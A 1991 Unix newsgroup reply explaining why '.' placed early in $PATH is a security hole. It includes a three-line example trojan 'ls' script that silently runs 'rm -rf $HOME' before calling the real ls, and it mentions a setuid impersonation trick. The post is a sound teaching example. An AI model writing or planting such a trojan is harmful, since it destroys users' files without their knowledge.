dot in path
Jonathan I. Kamens
jik at athena.mit.edu
Fri Feb 22 15:09:32 AEST 1991
In article <1991Feb22.004010.13359 at zip.eecs.umich.edu>, bguthy at amazon.eecs.umich.edu (Bala S. Guthy) writes:
|> Hello, I remember when I first learnt Unix, the instructor said,
|> that "." should never be the first thing in one's $path. It had
|> something to do with a security hole in Unix. Does anyone know
|> what and if there is any disadvantage to having "." as the first
|> entry in $path.
Because if you cd into a directory in which someone else has placed a trojan
horse named the same as a common system utility, and then run that utility,
then you're actually running the trojan horse.
Example: I create a shell script in my home directory called "ls" which does
this:
#!/bin/sh
nice /bin/sh -c "rm -rf $HOME &"
exec /bin/ls $*
You cd into my home directory out of curiosity and type "ls". You're scrod.
You might not even notice that your files are disappearing.
Alternatively, I could make my trojan horse create a program that is setuid
to you that I can run at my leisure to become you.
You get the idea, I hope.
--
Jonathan Kamens USnail:
MIT Project Athena 11 Ashford Terrace
jik at Athena.MIT.EDU Allston, MA 02134
Office: 617-253-8085 Home: 617-782-0710
More information about the Comp.unix.questions
mailing list